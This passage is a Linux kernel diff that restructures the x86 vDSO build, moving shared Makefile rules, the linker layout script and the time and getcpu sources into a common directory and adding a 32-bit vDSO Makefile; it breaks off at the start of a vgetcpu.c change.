diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index 3d9b09f..987b43f 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -3,159 +3,10 @@
# Building vDSO images for x86.
#
-# Include the generic Makefile to check the built vDSO:
-include $(srctree)/lib/vdso/Makefile.include
+# Regular kernel objects
+obj-y := vma.o extable.o
+obj-$(CONFIG_COMPAT_32) += vdso32-setup.o
-# Files to link into the vDSO:
-vobjs-y := vdso-note.o vclock_gettime.o vgetcpu.o vgetrandom.o vgetrandom-chacha.o
-vobjs32-y := vdso32/note.o vdso32/system_call.o vdso32/sigreturn.o
-vobjs32-y += vdso32/vclock_gettime.o vdso32/vgetcpu.o
-vobjs-$(CONFIG_X86_SGX) += vsgx.o
-
-# Files to link into the kernel:
-obj-y += vma.o extable.o
-
-# vDSO images to build:
-obj-$(CONFIG_X86_64) += vdso64-image.o
-obj-$(CONFIG_X86_X32_ABI) += vdsox32-image.o
-obj-$(CONFIG_COMPAT_32) += vdso32-image.o vdso32-setup.o
-
-vobjs := $(addprefix $(obj)/, $(vobjs-y))
-vobjs32 := $(addprefix $(obj)/, $(vobjs32-y))
-
-$(obj)/vdso.o: $(obj)/vdso.so
-
-targets += vdso.lds $(vobjs-y)
-targets += vdso32/vdso32.lds $(vobjs32-y)
-
-targets += $(foreach x, 64 x32 32, vdso-image-$(x).c vdso$(x).so vdso$(x).so.dbg)
-
-CPPFLAGS_vdso.lds += -P -C
-
-VDSO_LDFLAGS_vdso.lds = -m elf_x86_64 -soname linux-vdso.so.1 \
- -z max-page-size=4096
-
-$(obj)/vdso64.so.dbg: $(obj)/vdso.lds $(vobjs) FORCE
- $(call if_changed,vdso_and_check)
-
-VDSO2C = $(objtree)/arch/x86/tools/vdso2c
-
-quiet_cmd_vdso2c = VDSO2C $@
- cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
-
-$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(VDSO2C) FORCE
- $(call if_changed,vdso2c)
-
-#
-# Don't omit frame pointers for ease of userspace debugging, but do
-# optimize sibling calls.
-#
-CFL := $(PROFILING) -mcmodel=small -fPIC -O2 -fasynchronous-unwind-tables -m64 \
- $(filter -g%,$(KBUILD_CFLAGS)) -fno-stack-protector \
- -fno-omit-frame-pointer -foptimize-sibling-calls \
- -DDISABLE_BRANCH_PROFILING -DBUILD_VDSO
-
-ifdef CONFIG_MITIGATION_RETPOLINE
-ifneq ($(RETPOLINE_VDSO_CFLAGS),)
- CFL += $(RETPOLINE_VDSO_CFLAGS)
-endif
-endif
-
-$(vobjs): KBUILD_CFLAGS := $(filter-out $(PADDING_CFLAGS) $(CC_FLAGS_LTO) $(CC_FLAGS_CFI) $(RANDSTRUCT_CFLAGS) $(KSTACK_ERASE_CFLAGS) $(GCC_PLUGINS_CFLAGS) $(RETPOLINE_CFLAGS),$(KBUILD_CFLAGS)) $(CFL)
-$(vobjs): KBUILD_AFLAGS += -DBUILD_VDSO
-
-#
-# vDSO code runs in userspace and -pg doesn't help with profiling anyway.
-#
-CFLAGS_REMOVE_vclock_gettime.o = -pg
-CFLAGS_REMOVE_vdso32/vclock_gettime.o = -pg
-CFLAGS_REMOVE_vgetcpu.o = -pg
-CFLAGS_REMOVE_vdso32/vgetcpu.o = -pg
-CFLAGS_REMOVE_vsgx.o = -pg
-CFLAGS_REMOVE_vgetrandom.o = -pg
-
-#
-# X32 processes use x32 vDSO to access 64bit kernel data.
-#
-# Build x32 vDSO image:
-# 1. Compile x32 vDSO as 64bit.
-# 2. Convert object files to x32.
-# 3. Build x32 VDSO image with x32 objects, which contains 64bit codes
-# so that it can reach 64bit address space with 64bit pointers.
-#
-
-CPPFLAGS_vdsox32.lds = $(CPPFLAGS_vdso.lds)
-VDSO_LDFLAGS_vdsox32.lds = -m elf32_x86_64 -soname linux-vdso.so.1 \
- -z max-page-size=4096
-
-# x32-rebranded versions
-vobjx32s-y := $(vobjs-y:.o=-x32.o)
-
-# same thing, but in the output directory
-vobjx32s := $(addprefix $(obj)/, $(vobjx32s-y))
-
-# Convert 64bit object file to x32 for x32 vDSO.
-quiet_cmd_x32 = X32 $@
- cmd_x32 = $(OBJCOPY) -O elf32-x86-64 $< $@
-
-$(obj)/%-x32.o: $(obj)/%.o FORCE
- $(call if_changed,x32)
-
-targets += vdsox32.lds $(vobjx32s-y)
-
-$(obj)/%.so: OBJCOPYFLAGS := -S --remove-section __ex_table
-$(obj)/%.so: $(obj)/%.so.dbg FORCE
- $(call if_changed,objcopy)
-
-$(obj)/vdsox32.so.dbg: $(obj)/vdsox32.lds $(vobjx32s) FORCE
- $(call if_changed,vdso_and_check)
-
-CPPFLAGS_vdso32/vdso32.lds = $(CPPFLAGS_vdso.lds)
-VDSO_LDFLAGS_vdso32.lds = -m elf_i386 -soname linux-gate.so.1
-
-KBUILD_AFLAGS_32 := $(filter-out -m64,$(KBUILD_AFLAGS)) -DBUILD_VDSO
-$(obj)/vdso32.so.dbg: KBUILD_AFLAGS = $(KBUILD_AFLAGS_32)
-$(obj)/vdso32.so.dbg: asflags-$(CONFIG_X86_64) += -m32
-
-KBUILD_CFLAGS_32 := $(filter-out -m64,$(KBUILD_CFLAGS))
-KBUILD_CFLAGS_32 := $(filter-out -mcmodel=kernel,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out -fno-pic,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out -mfentry,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(RANDSTRUCT_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(KSTACK_ERASE_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(GCC_PLUGINS_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(RETPOLINE_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(CC_FLAGS_LTO),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(CC_FLAGS_CFI),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(PADDING_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 += -m32 -msoft-float -mregparm=0 -fpic
-KBUILD_CFLAGS_32 += -fno-stack-protector
-KBUILD_CFLAGS_32 += $(call cc-option, -foptimize-sibling-calls)
-KBUILD_CFLAGS_32 += -fno-omit-frame-pointer
-KBUILD_CFLAGS_32 += -DDISABLE_BRANCH_PROFILING
-KBUILD_CFLAGS_32 += -DBUILD_VDSO
-
-ifdef CONFIG_MITIGATION_RETPOLINE
-ifneq ($(RETPOLINE_VDSO_CFLAGS),)
- KBUILD_CFLAGS_32 += $(RETPOLINE_VDSO_CFLAGS)
-endif
-endif
-
-$(obj)/vdso32.so.dbg: KBUILD_CFLAGS = $(KBUILD_CFLAGS_32)
-
-$(obj)/vdso32.so.dbg: $(obj)/vdso32/vdso32.lds $(vobjs32) FORCE
- $(call if_changed,vdso_and_check)
-
-#
-# The DSO images are built using a special linker script.
-#
-quiet_cmd_vdso = VDSO $@
- cmd_vdso = $(LD) -o $@ \
- $(VDSO_LDFLAGS) $(VDSO_LDFLAGS_$(filter %.lds,$(^F))) \
- -T $(filter %.lds,$^) $(filter %.o,$^)
-
-VDSO_LDFLAGS = -shared --hash-style=both --build-id=sha1 --no-undefined \
- $(call ld-option, --eh-frame-hdr) -Bsymbolic -z noexecstack
-
-quiet_cmd_vdso_and_check = VDSO $@
- cmd_vdso_and_check = $(cmd_vdso); $(cmd_vdso_check)
+# vDSO directories
+obj-$(CONFIG_X86_64) += vdso64/
+obj-$(CONFIG_COMPAT_32) += vdso32/
diff --git a/arch/x86/entry/vdso/common/Makefile.include b/arch/x86/entry/vdso/common/Makefile.include
new file mode 100644
index 0000000..3514b4a
--- /dev/null
+++ b/arch/x86/entry/vdso/common/Makefile.include
@@ -0,0 +1,89 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# Building vDSO images for x86.
+#
+
+# Include the generic Makefile to check the built vDSO:
+include $(srctree)/lib/vdso/Makefile.include
+
+obj-y += $(foreach x,$(vdsos-y),vdso$(x)-image.o)
+
+targets += $(foreach x,$(vdsos-y),vdso$(x)-image.c vdso$(x).so vdso$(x).so.dbg vdso$(x).lds)
+targets += $(vobjs-y)
+
+# vobjs-y with $(obj)/ prepended
+vobjs := $(addprefix $(obj)/,$(vobjs-y))
+
+# Options for vdso*.lds
+CPPFLAGS_VDSO_LDS := -P -C -I$(src)/..
+$(obj)/%.lds : KBUILD_CPPFLAGS += $(CPPFLAGS_VDSO_LDS)
+
+#
+# Options from KBUILD_[AC]FLAGS that should *NOT* be kept
+#
+flags-remove-y += \
+ -D__KERNEL__ -mcmodel=kernel -mregparm=3 \
+ -fno-pic -fno-PIC -fno-pie fno-PIE \
+ -mfentry -pg \
+ $(RANDSTRUCT_CFLAGS) $(GCC_PLUGIN_CFLAGS) $(KSTACK_ERASE_CFLAGS) \
+ $(RETPOLINE_CFLAGS) $(CC_FLAGS_LTO) $(CC_FLAGS_CFI) \
+ $(PADDING_CFLAGS)
+
+#
+# Don't omit frame pointers for ease of userspace debugging, but do
+# optimize sibling calls.
+#
+flags-y += -D__DISABLE_EXPORTS
+flags-y += -DDISABLE_BRANCH_PROFILING
+flags-y += -DBUILD_VDSO
+flags-y += -I$(src)/.. -I$(srctree)
+flags-y += -O2 -fpic
+flags-y += -fno-stack-protector
+flags-y += -fno-omit-frame-pointer
+flags-y += -foptimize-sibling-calls
+flags-y += -fasynchronous-unwind-tables
+
+# Reset cf protections enabled by compiler default
+flags-y += $(call cc-option, -fcf-protection=none)
+flags-$(X86_USER_SHADOW_STACK) += $(call cc-option, -fcf-protection=return)
+# When user space IBT is supported, enable this.
+# flags-$(CONFIG_USER_IBT) += $(call cc-option, -fcf-protection=branch)
+
+flags-$(CONFIG_MITIGATION_RETPOLINE) += $(RETPOLINE_VDSO_CFLAGS)
+
+# These need to be conditional on $(vobjs) as they do not apply to
+# the output vdso*-image.o files which are standard kernel objects.
+$(vobjs) : KBUILD_AFLAGS := \
+ $(filter-out $(flags-remove-y),$(KBUILD_AFLAGS)) $(flags-y)
+$(vobjs) : KBUILD_CFLAGS := \
+ $(filter-out $(flags-remove-y),$(KBUILD_CFLAGS)) $(flags-y)
+
+#
+# The VDSO images are built using a special linker script.
+#
+VDSO_LDFLAGS := -shared --hash-style=both --build-id=sha1 --no-undefined \
+ $(call ld-option, --eh-frame-hdr) -Bsymbolic -z noexecstack
+
+quiet_cmd_vdso = VDSO $@
+ cmd_vdso = $(LD) -o $@ \
+ $(VDSO_LDFLAGS) $(VDSO_LDFLAGS_$*) \
+ -T $(filter %.lds,$^) $(filter %.o,$^)
+quiet_cmd_vdso_and_check = VDSO $@
+ cmd_vdso_and_check = $(cmd_vdso); $(cmd_vdso_check)
+
+$(obj)/vdso%.so.dbg: $(obj)/vdso%.lds FORCE
+ $(call if_changed,vdso_and_check)
+
+$(obj)/%.so: OBJCOPYFLAGS := -S --remove-section __ex_table
+$(obj)/%.so: $(obj)/%.so.dbg FORCE
+ $(call if_changed,objcopy)
+
+VDSO2C = $(objtree)/arch/x86/tools/vdso2c
+
+quiet_cmd_vdso2c = VDSO2C $@
+ cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
+
+$(obj)/%-image.c: $(obj)/%.so.dbg $(obj)/%.so $(VDSO2C) FORCE
+ $(call if_changed,vdso2c)
+
+$(obj)/%-image.o: $(obj)/%-image.c
diff --git a/arch/x86/entry/vdso/common/note.S b/arch/x86/entry/vdso/common/note.S
new file mode 100644
index 0000000..2cbd399
--- /dev/null
+++ b/arch/x86/entry/vdso/common/note.S
@@ -0,0 +1,18 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * This supplies .note.* sections to go into the PT_NOTE inside the vDSO text.
+ * Here we can supply some information useful to userland.
+ */
+
+#include <linux/build-salt.h>
+#include <linux/version.h>
+#include <linux/elfnote.h>
+
+/* Ideally this would use UTS_NAME, but using a quoted string here
+ doesn't work. Remember to change this when changing the
+ kernel's name. */
+ELFNOTE_START(Linux, 0, "a")
+ .long LINUX_VERSION_CODE
+ELFNOTE_END
+
+BUILD_SALT
diff --git a/arch/x86/entry/vdso/common/vclock_gettime.c b/arch/x86/entry/vdso/common/vclock_gettime.c
new file mode 100644
index 0000000..0debc19
--- /dev/null
+++ b/arch/x86/entry/vdso/common/vclock_gettime.c
@@ -0,0 +1,77 @@
+// SPDX-License-Identifier: GPL-2.0-only
+/*
+ * Fast user context implementation of clock_gettime, gettimeofday, and time.
+ *
+ * Copyright 2006 Andi Kleen, SUSE Labs.
+ * Copyright 2019 ARM Limited
+ *
+ * 32 Bit compat layer by Stefani Seibold <stefani@seibold.net>
+ * sponsored by Rohde & Schwarz GmbH & Co. KG Munich/Germany
+ */
+#include <linux/time.h>
+#include <linux/kernel.h>
+#include <linux/types.h>
+#include <vdso/gettime.h>
+
+#include "../../../../lib/vdso/gettimeofday.c"
+
+int __vdso_gettimeofday(struct __kernel_old_timeval *tv, struct timezone *tz)
+{
+ return __cvdso_gettimeofday(tv, tz);
+}
+
+int gettimeofday(struct __kernel_old_timeval *, struct timezone *)
+ __attribute__((weak, alias("__vdso_gettimeofday")));
+
+__kernel_old_time_t __vdso_time(__kernel_old_time_t *t)
+{
+ return __cvdso_time(t);
+}
+
+__kernel_old_time_t time(__kernel_old_time_t *t) __attribute__((weak, alias("__vdso_time")));
+
+
+#if defined(CONFIG_X86_64) && !defined(BUILD_VDSO32_64)
+/* both 64-bit and x32 use these */
+int __vdso_clock_gettime(clockid_t clock, struct __kernel_timespec *ts)
+{
+ return __cvdso_clock_gettime(clock, ts);
+}
+
+int clock_gettime(clockid_t, struct __kernel_timespec *)
+ __attribute__((weak, alias("__vdso_clock_gettime")));
+
+int __vdso_clock_getres(clockid_t clock,
+ struct __kernel_timespec *res)
+{
+ return __cvdso_clock_getres(clock, res);
+}
+int clock_getres(clockid_t, struct __kernel_timespec *)
+ __attribute__((weak, alias("__vdso_clock_getres")));
+
+#else
+/* i386 only */
+int __vdso_clock_gettime(clockid_t clock, struct old_timespec32 *ts)
+{
+ return __cvdso_clock_gettime32(clock, ts);
+}
+
+int clock_gettime(clockid_t, struct old_timespec32 *)
+ __attribute__((weak, alias("__vdso_clock_gettime")));
+
+int __vdso_clock_gettime64(clockid_t clock, struct __kernel_timespec *ts)
+{
+ return __cvdso_clock_gettime(clock, ts);
+}
+
+int clock_gettime64(clockid_t, struct __kernel_timespec *)
+ __attribute__((weak, alias("__vdso_clock_gettime64")));
+
+int __vdso_clock_getres(clockid_t clock, struct old_timespec32 *res)
+{
+ return __cvdso_clock_getres_time32(clock, res);
+}
+
+int clock_getres(clockid_t, struct old_timespec32 *)
+ __attribute__((weak, alias("__vdso_clock_getres")));
+#endif
diff --git a/arch/x86/entry/vdso/common/vdso-layout.lds.S b/arch/x86/entry/vdso/common/vdso-layout.lds.S
new file mode 100644
index 0000000..ec1ac19
--- /dev/null
+++ b/arch/x86/entry/vdso/common/vdso-layout.lds.S
@@ -0,0 +1,101 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+#include <asm/vdso.h>
+#include <asm/vdso/vsyscall.h>
+#include <vdso/datapage.h>
+
+/*
+ * Linker script for vDSO. This is an ELF shared object prelinked to
+ * its virtual address, and with only one read-only segment.
+ * This script controls its layout.
+ */
+
+SECTIONS
+{
+ /*
+ * User/kernel shared data is before the vDSO. This may be a little
+ * uglier than putting it after the vDSO, but it avoids issues with
+ * non-allocatable things that dangle past the end of the PT_LOAD
+ * segment.
+ */
+
+ VDSO_VVAR_SYMS
+
+ vclock_pages = VDSO_VCLOCK_PAGES_START(vdso_u_data);
+ pvclock_page = vclock_pages + VDSO_PAGE_PVCLOCK_OFFSET * PAGE_SIZE;
+ hvclock_page = vclock_pages + VDSO_PAGE_HVCLOCK_OFFSET * PAGE_SIZE;
+
+ . = SIZEOF_HEADERS;
+
+ .hash : { *(.hash) } :text
+ .gnu.hash : { *(.gnu.hash) }
+ .dynsym : { *(.dynsym) }
+ .dynstr : { *(.dynstr) }
+ .gnu.version : { *(.gnu.version) }
+ .gnu.version_d : { *(.gnu.version_d) }
+ .gnu.version_r : { *(.gnu.version_r) }
+
+ .dynamic : { *(.dynamic) } :text :dynamic
+
+ .rodata : {
+ *(.rodata*)
+ *(.data*)
+ *(.sdata*)
+ *(.got.plt) *(.got)
+ *(.gnu.linkonce.d.*)
+ *(.bss*)
+ *(.dynbss*)
+ *(.gnu.linkonce.b.*)
+ } :text
+
+ /*
+ * Discard .note.gnu.property sections which are unused and have
+ * different alignment requirement from vDSO note sections.
+ */
+ /DISCARD/ : {
+ *(.note.gnu.property)
+ }
+ .note : { *(.note.*) } :text :note
+
+ .eh_frame_hdr : { *(.eh_frame_hdr) } :text :eh_frame_hdr
+ .eh_frame : { KEEP (*(.eh_frame)) } :text
+
+
+ /*
+ * Text is well-separated from actual data: there's plenty of
+ * stuff that isn't used at runtime in between.
+ */
+
+ .text : {
+ *(.text*)
+ } :text =0x90909090,
+
+
+
+ .altinstructions : { *(.altinstructions) } :text
+ .altinstr_replacement : { *(.altinstr_replacement) } :text
+
+ __ex_table : { *(__ex_table) } :text
+
+ /DISCARD/ : {
+ *(.discard)
+ *(.discard.*)
+ *(__bug_table)
+ }
+}
+
+/*
+ * Very old versions of ld do not recognize this name token; use the constant.
+ */
+#define PT_GNU_EH_FRAME 0x6474e550
+
+/*
+ * We must supply the ELF program headers explicitly to get just one
+ * PT_LOAD segment, and set the flags explicitly to make segments read-only.
+ */
+PHDRS
+{
+ text PT_LOAD FLAGS(5) FILEHDR PHDRS; /* PF_R|PF_X */
+ dynamic PT_DYNAMIC FLAGS(4); /* PF_R */
+ note PT_NOTE FLAGS(4); /* PF_R */
+ eh_frame_hdr PT_GNU_EH_FRAME;
+}
diff --git a/arch/x86/entry/vdso/common/vgetcpu.c b/arch/x86/entry/vdso/common/vgetcpu.c
new file mode 100644
index 0000000..e464030
--- /dev/null
+++ b/arch/x86/entry/vdso/common/vgetcpu.c
@@ -0,0 +1,22 @@
+// SPDX-License-Identifier: GPL-2.0-only
+/*
+ * Copyright 2006 Andi Kleen, SUSE Labs.
+ *
+ * Fast user context implementation of getcpu()
+ */
+
+#include <linux/kernel.h>
+#include <linux/getcpu.h>
+#include <asm/segment.h>
+#include <vdso/processor.h>
+
+notrace long
+__vdso_getcpu(unsigned *cpu, unsigned *node, struct getcpu_cache *unused)
+{
+ vdso_read_cpunode(cpu, node);
+
+ return 0;
+}
+
+long getcpu(unsigned *cpu, unsigned *node, struct getcpu_cache *tcache)
+ __attribute__((weak, alias("__vdso_getcpu")));
diff --git a/arch/x86/entry/vdso/vclock_gettime.c b/arch/x86/entry/vdso/vclock_gettime.c
deleted file mode 100644
index 0debc19..0000000
--- a/arch/x86/entry/vdso/vclock_gettime.c
+++ /dev/null
@@ -1,77 +0,0 @@
-// SPDX-License-Identifier: GPL-2.0-only
-/*
- * Fast user context implementation of clock_gettime, gettimeofday, and time.
- *
- * Copyright 2006 Andi Kleen, SUSE Labs.
- * Copyright 2019 ARM Limited
- *
- * 32 Bit compat layer by Stefani Seibold <stefani@seibold.net>
- * sponsored by Rohde & Schwarz GmbH & Co. KG Munich/Germany
- */
-#include <linux/time.h>
-#include <linux/kernel.h>
-#include <linux/types.h>
-#include <vdso/gettime.h>
-
-#include "../../../../lib/vdso/gettimeofday.c"
-
-int __vdso_gettimeofday(struct __kernel_old_timeval *tv, struct timezone *tz)
-{
- return __cvdso_gettimeofday(tv, tz);
-}
-
-int gettimeofday(struct __kernel_old_timeval *, struct timezone *)
- __attribute__((weak, alias("__vdso_gettimeofday")));
-
-__kernel_old_time_t __vdso_time(__kernel_old_time_t *t)
-{
- return __cvdso_time(t);
-}
-
-__kernel_old_time_t time(__kernel_old_time_t *t) __attribute__((weak, alias("__vdso_time")));
-
-
-#if defined(CONFIG_X86_64) && !defined(BUILD_VDSO32_64)
-/* both 64-bit and x32 use these */
-int __vdso_clock_gettime(clockid_t clock, struct __kernel_timespec *ts)
-{
- return __cvdso_clock_gettime(clock, ts);
-}
-
-int clock_gettime(clockid_t, struct __kernel_timespec *)
- __attribute__((weak, alias("__vdso_clock_gettime")));
-
-int __vdso_clock_getres(clockid_t clock,
- struct __kernel_timespec *res)
-{
- return __cvdso_clock_getres(clock, res);
-}
-int clock_getres(clockid_t, struct __kernel_timespec *)
- __attribute__((weak, alias("__vdso_clock_getres")));
-
-#else
-/* i386 only */
-int __vdso_clock_gettime(clockid_t clock, struct old_timespec32 *ts)
-{
- return __cvdso_clock_gettime32(clock, ts);
-}
-
-int clock_gettime(clockid_t, struct old_timespec32 *)
- __attribute__((weak, alias("__vdso_clock_gettime")));
-
-int __vdso_clock_gettime64(clockid_t clock, struct __kernel_timespec *ts)
-{
- return __cvdso_clock_gettime(clock, ts);
-}
-
-int clock_gettime64(clockid_t, struct __kernel_timespec *)
- __attribute__((weak, alias("__vdso_clock_gettime64")));
-
-int __vdso_clock_getres(clockid_t clock, struct old_timespec32 *res)
-{
- return __cvdso_clock_getres_time32(clock, res);
-}
-
-int clock_getres(clockid_t, struct old_timespec32 *)
- __attribute__((weak, alias("__vdso_clock_getres")));
-#endif
diff --git a/arch/x86/entry/vdso/vdso-layout.lds.S b/arch/x86/entry/vdso/vdso-layout.lds.S
deleted file mode 100644
index ec1ac19..0000000
--- a/arch/x86/entry/vdso/vdso-layout.lds.S
+++ /dev/null
@@ -1,101 +0,0 @@
-/* SPDX-License-Identifier: GPL-2.0 */
-#include <asm/vdso.h>
-#include <asm/vdso/vsyscall.h>
-#include <vdso/datapage.h>
-
-/*
- * Linker script for vDSO. This is an ELF shared object prelinked to
- * its virtual address, and with only one read-only segment.
- * This script controls its layout.
- */
-
-SECTIONS
-{
- /*
- * User/kernel shared data is before the vDSO. This may be a little
- * uglier than putting it after the vDSO, but it avoids issues with
- * non-allocatable things that dangle past the end of the PT_LOAD
- * segment.
- */
-
- VDSO_VVAR_SYMS
-
- vclock_pages = VDSO_VCLOCK_PAGES_START(vdso_u_data);
- pvclock_page = vclock_pages + VDSO_PAGE_PVCLOCK_OFFSET * PAGE_SIZE;
- hvclock_page = vclock_pages + VDSO_PAGE_HVCLOCK_OFFSET * PAGE_SIZE;
-
- . = SIZEOF_HEADERS;
-
- .hash : { *(.hash) } :text
- .gnu.hash : { *(.gnu.hash) }
- .dynsym : { *(.dynsym) }
- .dynstr : { *(.dynstr) }
- .gnu.version : { *(.gnu.version) }
- .gnu.version_d : { *(.gnu.version_d) }
- .gnu.version_r : { *(.gnu.version_r) }
-
- .dynamic : { *(.dynamic) } :text :dynamic
-
- .rodata : {
- *(.rodata*)
- *(.data*)
- *(.sdata*)
- *(.got.plt) *(.got)
- *(.gnu.linkonce.d.*)
- *(.bss*)
- *(.dynbss*)
- *(.gnu.linkonce.b.*)
- } :text
-
- /*
- * Discard .note.gnu.property sections which are unused and have
- * different alignment requirement from vDSO note sections.
- */
- /DISCARD/ : {
- *(.note.gnu.property)
- }
- .note : { *(.note.*) } :text :note
-
- .eh_frame_hdr : { *(.eh_frame_hdr) } :text :eh_frame_hdr
- .eh_frame : { KEEP (*(.eh_frame)) } :text
-
-
- /*
- * Text is well-separated from actual data: there's plenty of
- * stuff that isn't used at runtime in between.
- */
-
- .text : {
- *(.text*)
- } :text =0x90909090,
-
-
-
- .altinstructions : { *(.altinstructions) } :text
- .altinstr_replacement : { *(.altinstr_replacement) } :text
-
- __ex_table : { *(__ex_table) } :text
-
- /DISCARD/ : {
- *(.discard)
- *(.discard.*)
- *(__bug_table)
- }
-}
-
-/*
- * Very old versions of ld do not recognize this name token; use the constant.
- */
-#define PT_GNU_EH_FRAME 0x6474e550
-
-/*
- * We must supply the ELF program headers explicitly to get just one
- * PT_LOAD segment, and set the flags explicitly to make segments read-only.
- */
-PHDRS
-{
- text PT_LOAD FLAGS(5) FILEHDR PHDRS; /* PF_R|PF_X */
- dynamic PT_DYNAMIC FLAGS(4); /* PF_R */
- note PT_NOTE FLAGS(4); /* PF_R */
- eh_frame_hdr PT_GNU_EH_FRAME;
-}
diff --git a/arch/x86/entry/vdso/vdso-note.S b/arch/x86/entry/vdso/vdso-note.S
deleted file mode 100644
index 7942317..0000000
--- a/arch/x86/entry/vdso/vdso-note.S
+++ /dev/null
@@ -1,15 +0,0 @@
-/*
- * This supplies .note.* sections to go into the PT_NOTE inside the vDSO text.
- * Here we can supply some information useful to userland.
- */
-
-#include <linux/build-salt.h>
-#include <linux/uts.h>
-#include <linux/version.h>
-#include <linux/elfnote.h>
-
-ELFNOTE_START(Linux, 0, "a")
- .long LINUX_VERSION_CODE
-ELFNOTE_END
-
-BUILD_SALT
diff --git a/arch/x86/entry/vdso/vdso.lds.S b/arch/x86/entry/vdso/vdso.lds.S
deleted file mode 100644
index 0bab5f4..0000000
--- a/arch/x86/entry/vdso/vdso.lds.S
+++ /dev/null
@@ -1,37 +0,0 @@
-/* SPDX-License-Identifier: GPL-2.0 */
-/*
- * Linker script for 64-bit vDSO.
- * We #include the file to define the layout details.
- *
- * This file defines the version script giving the user-exported symbols in
- * the DSO.
- */
-
-#define BUILD_VDSO64
-
-#include "vdso-layout.lds.S"
-
-/*
- * This controls what userland symbols we export from the vDSO.
- */
-VERSION {
- LINUX_2.6 {
- global:
- clock_gettime;
- __vdso_clock_gettime;
- gettimeofday;
- __vdso_gettimeofday;
- getcpu;
- __vdso_getcpu;
- time;
- __vdso_time;
- clock_getres;
- __vdso_clock_getres;
-#ifdef CONFIG_X86_SGX
- __vdso_sgx_enter_enclave;
-#endif
- getrandom;
- __vdso_getrandom;
- local: *;
- };
-}
diff --git a/arch/x86/entry/vdso/vdso32/Makefile b/arch/x86/entry/vdso/vdso32/Makefile
new file mode 100644
index 0000000..add6afb
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso32/Makefile
@@ -0,0 +1,24 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# 32-bit vDSO images for x86.
+#
+
+# The vDSOs built in this directory
+vdsos-y := 32
+
+# Files to link into the vDSO:
+vobjs-y := note.o vclock_gettime.o vgetcpu.o
+vobjs-y += system_call.o sigreturn.o
+
+# Compilation flags
+flags-y := -DBUILD_VDSO32 -m32 -mregparm=0
+flags-$(CONFIG_X86_64) += -include $(src)/fake_32bit_build.h
+flags-remove-y := -m64
+
+# The location of this include matters!
+include $(src)/../common/Makefile.include
+
+# Linker options for the vdso
+VDSO_LDFLAGS_32 := -m elf_i386 -soname linux-gate.so.1
+
+$(obj)/vdso32.so.dbg: $(vobjs)
diff --git a/arch/x86/entry/vdso/vdso32/note.S b/arch/x86/entry/vdso/vdso32/note.S
index 2cbd399..62d8aa5 100644
--- a/arch/x86/entry/vdso/vdso32/note.S
+++ b/arch/x86/entry/vdso/vdso32/note.S
@@ -1,18 +1 @@
-/* SPDX-License-Identifier: GPL-2.0 */
-/*
- * This supplies .note.* sections to go into the PT_NOTE inside the vDSO text.
- * Here we can supply some information useful to userland.
- */
-
-#include <linux/build-salt.h>
-#include <linux/version.h>
-#include <linux/elfnote.h>
-
-/* Ideally this would use UTS_NAME, but using a quoted string here
- doesn't work. Remember to change this when changing the
- kernel's name. */
-ELFNOTE_START(Linux, 0, "a")
- .long LINUX_VERSION_CODE
-ELFNOTE_END
-
-BUILD_SALT
+#include "common/note.S"
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index d33c651..2a15634 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -52,7 +52,7 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
-#ifdef CONFIG_X86_64
+#ifdef BUILD_VDSO32_64
/* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSENTER32, \
SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
diff --git a/arch/x86/entry/vdso/vdso32/vclock_gettime.c b/arch/x86/entry/vdso/vdso32/vclock_gettime.c
index 86981de..1481f00 100644
--- a/arch/x86/entry/vdso/vdso32/vclock_gettime.c
+++ b/arch/x86/entry/vdso/vdso32/vclock_gettime.c
@@ -1,4 +1 @@
-// SPDX-License-Identifier: GPL-2.0
-#define BUILD_VDSO32
-#include "fake_32bit_build.h"
-#include "../vclock_gettime.c"
+#include "common/vclock_gettime.c"
diff --git a/arch/x86/entry/vdso/vdso32/vdso32.lds.S b/arch/x86/entry/vdso/vdso32/vdso32.lds.S
index 8a3be07..8a85354 100644
--- a/arch/x86/entry/vdso/vdso32/vdso32.lds.S
+++ b/arch/x86/entry/vdso/vdso32/vdso32.lds.S
@@ -11,7 +11,7 @@
#define BUILD_VDSO32
-#include "../vdso-layout.lds.S"
+#include "common/vdso-layout.lds.S"
/* The ELF entry point can be used to set the AT_SYSINFO value. */
ENTRY(__kernel_vsyscall);
diff --git a/arch/x86/entry/vdso/vdso32/vgetcpu.c b/arch/x86/entry/vdso/vdso32/vgetcpu.c
index 3a9791f..00cc832 100644
--- a/arch/x86/entry/vdso/vdso32/vgetcpu.c
+++ b/arch/x86/entry/vdso/vdso32/vgetcpu.c
